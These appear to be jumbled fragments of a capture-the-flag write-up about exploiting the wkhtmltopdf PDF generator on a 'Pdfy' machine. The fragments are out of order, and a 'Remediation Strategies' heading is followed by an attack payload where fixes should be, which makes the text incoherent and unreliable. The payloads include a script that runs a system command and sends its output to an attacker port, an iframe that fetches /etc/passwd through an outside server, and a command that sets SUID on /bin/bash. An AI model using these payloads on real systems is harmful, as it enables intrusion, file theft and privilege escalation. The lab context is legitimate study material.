There are several effective ways to craft the malicious HTML page. All of them achieve the same goal: forcing wkhtmltopdf to read the /etc/passwd file. Here are three reliable methods.
The Pdfy machine highlights the critical security risks associated with server-side document generation utilities.
Change the file:///etc/passwd path to file:///flag.txt in your exploit.php file and rerun the request to retrieve the flag.

Remediation Strategies

To secure against this attack, implement the following:
<script> document.write('<img src="http://your-ip:4444/?c=' + require('child_process').execSync('id') + '">'); </script>
# Define the malicious file contents
malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"
<!DOCTYPE html>
<html>
<body>
<iframe src="http://our-server.com/axura.php?x=/etc/passwd" height="1000px" width="1000px"></iframe>
</body>
</html>
"converter": "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'"